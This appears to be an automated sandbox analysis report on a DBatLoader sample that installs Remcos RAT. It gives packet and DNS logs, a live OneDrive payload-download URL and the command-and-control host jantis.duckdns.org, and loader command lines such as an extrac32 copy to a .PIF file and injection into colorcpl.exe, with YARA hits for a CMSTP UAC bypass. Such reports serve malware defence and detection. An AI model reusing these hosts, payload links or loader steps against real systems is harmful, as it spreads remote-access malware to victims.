                                                                                                                            Apr 18, 2024 21:27:11.720913887 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:27:41.339776993 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:27:41.395857096 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:27:42.068651915 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:27:42.456818104 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:28:11.352612972 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:28:11.353868008 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:28:11.752130985 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:28:41.370573997 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:28:41.372165918 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:28:41.767669916 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:28:47.270982027 CEST4970880192.168.2.5178.237.33.50
                                                                                                                            Apr 18, 2024 21:28:47.864898920 CEST4970880192.168.2.5178.237.33.50
                                                                                                                            Apr 18, 2024 21:28:48.958183050 CEST4970880192.168.2.5178.237.33.50
                                                                                                                            Apr 18, 2024 21:28:50.973803043 CEST4970880192.168.2.5178.237.33.50
                                                                                                                            Apr 18, 2024 21:28:55.051925898 CEST4970880192.168.2.5178.237.33.50
                                                                                                                            Apr 18, 2024 21:29:03.164782047 CEST4970880192.168.2.5178.237.33.50
                                                                                                                            Apr 18, 2024 21:29:11.385348082 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:29:11.387413025 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:29:11.783479929 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:29:19.364510059 CEST4970880192.168.2.5178.237.33.50
                                                                                                                            Apr 18, 2024 21:29:41.398180962 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:29:41.399560928 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:29:41.783452988 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:30:11.415009975 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:30:11.416225910 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:30:11.814536095 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:30:41.432210922 CEST118849707103.186.117.171192.168.2.5
                                                                                                                            Apr 18, 2024 21:30:41.433906078 CEST497071188192.168.2.5103.186.117.171
                                                                                                                            Apr 18, 2024 21:30:41.830257893 CEST118849707103.186.117.171192.168.2.5

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Apr 18, 2024 21:26:51.496304989 CEST5316053192.168.2.51.1.1.1
                                                                                                                            Apr 18, 2024 21:26:52.408993959 CEST6264653192.168.2.51.1.1.1
                                                                                                                            Apr 18, 2024 21:26:55.586582899 CEST5897953192.168.2.51.1.1.1
                                                                                                                            Apr 18, 2024 21:26:55.729940891 CEST53589791.1.1.1192.168.2.5
                                                                                                                            Apr 18, 2024 21:26:57.288090944 CEST6534153192.168.2.51.1.1.1
                                                                                                                            Apr 18, 2024 21:26:57.394279957 CEST53653411.1.1.1192.168.2.5

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Apr 18, 2024 21:26:51.496304989 CEST192.168.2.51.1.1.10x2be7Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                            Apr 18, 2024 21:26:52.408993959 CEST192.168.2.51.1.1.10x5013Standard query (0)gjc1pa.dm.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                            Apr 18, 2024 21:26:55.586582899 CEST192.168.2.51.1.1.10x346Standard query (0)jantis.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                            Apr 18, 2024 21:26:57.288090944 CEST192.168.2.51.1.1.10x4f14Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Apr 18, 2024 21:26:51.601991892 CEST1.1.1.1192.168.2.50x2be7No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Apr 18, 2024 21:26:51.601991892 CEST1.1.1.1192.168.2.50x2be7No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Apr 18, 2024 21:26:51.601991892 CEST1.1.1.1192.168.2.50x2be7No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Apr 18, 2024 21:26:51.601991892 CEST1.1.1.1192.168.2.50x2be7No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                            Apr 18, 2024 21:26:51.601991892 CEST1.1.1.1192.168.2.50x2be7No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                            Apr 18, 2024 21:26:52.683723927 CEST1.1.1.1192.168.2.50x5013No error (0)gjc1pa.dm.files.1drv.comdm-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Apr 18, 2024 21:26:52.683723927 CEST1.1.1.1192.168.2.50x5013No error (0)dm-files.fe.1drv.comodc-dm-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Apr 18, 2024 21:26:55.729940891 CEST1.1.1.1192.168.2.50x346No error (0)jantis.duckdns.org103.186.117.171A (IP address)IN (0x0001)false
                                                                                                                            Apr 18, 2024 21:26:57.394279957 CEST1.1.1.1192.168.2.50x4f14No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • onedrive.live.com
                                                                                                                            • geoplugin.net

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.549708178.237.33.50802800C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Apr 18, 2024 21:26:57.603413105 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                            Host: geoplugin.net
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Apr 18, 2024 21:26:57.812165976 CEST1171INHTTP/1.1 200 OK
                                                                                                                            date: Thu, 18 Apr 2024 19:26:57 GMT
                                                                                                                            server: Apache
                                                                                                                            content-length: 963
                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                            cache-control: public, max-age=300
                                                                                                                            access-control-allow-origin: *
                                                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 61 72 69 65 74 74 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 47 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 34 2e 30 34 31 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 34 2e 35 30 35 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 31 30 30 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                            Data Ascii: { "geoplugin_request":"81.181.57.52", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Marietta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0414", "geoplugin_longitude":"-84.5053", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.54970513.107.139.114431436C:\Users\user\Desktop\XY2I8rWLkM.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-04-18 19:26:52 UTC213OUTGET /download?resid=38773C188FECDED2%21107&authkey=!APdTZ0yd8fEkIVs HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept: */*
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                            Host: onedrive.live.com
                                                                                                                            2024-04-18 19:26:52 UTC1177INHTTP/1.1 302 Found
                                                                                                                            Cache-Control: no-cache, no-store
                                                                                                                            Pragma: no-cache
                                                                                                                            Content-Type: text/html
                                                                                                                            Expires: -1
                                                                                                                            Location: https://gjc1pa.dm.files.1drv.com/y4m5jEZDAORJUhy5vxdvGivD8AK7KXuBMHd6mI9R-9NoISk9eoRi5CGeKvx95WShCc-0XgtOyfEmk3l9_83jLmgZ2XvHiZV81lGwhk3hoLi_u_lez5ikWuSMi7ZPKtzKc9_by89lh4ugGGSq3lKtxM-ABvpU3qEZgGAX9cW_UuxSLLdL9xjTc2Wi6XCE1pCmcgQQww3qsERCm4EmLefCho1ag/255_Ocihlomcwix?download&psid=1
                                                                                                                            Set-Cookie: E=P:tOIagN1f3Ig=:odl7qcUcXZKlT811Mz+5kFrZYozcOtTexwLEsOew5Ag=:F; domain=.live.com; path=/
                                                                                                                            Set-Cookie: xid=e5095892-35e0-4306-8393-ca9ba3c59257&&ODSP-ODWEB-ODCF&146; domain=.live.com; path=/
                                                                                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                            Set-Cookie: LD=; domain=.live.com; expires=Thu, 18-Apr-2024 17:46:52 GMT; path=/
                                                                                                                            Set-Cookie: wla42=; domain=live.com; expires=Thu, 25-Apr-2024 19:26:52 GMT; path=/
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            X-MSNServer: 5fd6fc6db4-t7gcx
                                                                                                                            X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                            X-MSEdge-Ref: Ref A: 41822A55E36F4DB18E817589FA33381C Ref B: BN3EDGE1011 Ref C: 2024-04-18T19:26:52Z
                                                                                                                            Date: Thu, 18 Apr 2024 19:26:52 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 0


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:21:26:50
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Users\user\Desktop\XY2I8rWLkM.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\XY2I8rWLkM.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:2'200'064 bytes
                                                                                                                            MD5 hash:29AF19382BDEADEE6D93B98F354E703D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:2
                                                                                                                            Start time:21:26:53
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\OcihlomcO.bat" "
                                                                                                                            Imagebase:0x790000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:3
                                                                                                                            Start time:21:26:53
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:4
                                                                                                                            Start time:21:26:53
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\XY2I8rWLkM.exe C:\\Users\\Public\\Libraries\\Ocihlomc.PIF
                                                                                                                            Imagebase:0x230000
                                                                                                                            File size:29'184 bytes
                                                                                                                            MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:5
                                                                                                                            Start time:21:26:54
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                                            Imagebase:0x530000
                                                                                                                            File size:86'528 bytes
                                                                                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:6
                                                                                                                            Start time:21:26:54
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:7
                                                                                                                            Start time:21:27:04
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Users\Public\Libraries\Ocihlomc.PIF
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\Public\Libraries\Ocihlomc.PIF"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:2'200'064 bytes
                                                                                                                            MD5 hash:29AF19382BDEADEE6D93B98F354E703D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.2154857966.0000000002AE1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 53%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:8
                                                                                                                            Start time:21:27:05
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\System32\SndVol.exe
                                                                                                                            Imagebase:0xe90000
                                                                                                                            File size:226'712 bytes
                                                                                                                            MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2153175404.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:10
                                                                                                                            Start time:21:27:12
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Users\Public\Libraries\Ocihlomc.PIF
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\Public\Libraries\Ocihlomc.PIF"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:2'200'064 bytes
                                                                                                                            MD5 hash:29AF19382BDEADEE6D93B98F354E703D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000002.2212258273.00000000029B1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:11
                                                                                                                            Start time:21:27:12
                                                                                                                            Start date:18/04/2024
                                                                                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                                            Imagebase:0x530000
                                                                                                                            File size:86'528 bytes
                                                                                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:18.8%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:81.1%
                                                                                                                              Total number of Nodes:2000
                                                                                                                              Total number of Limit Nodes:22
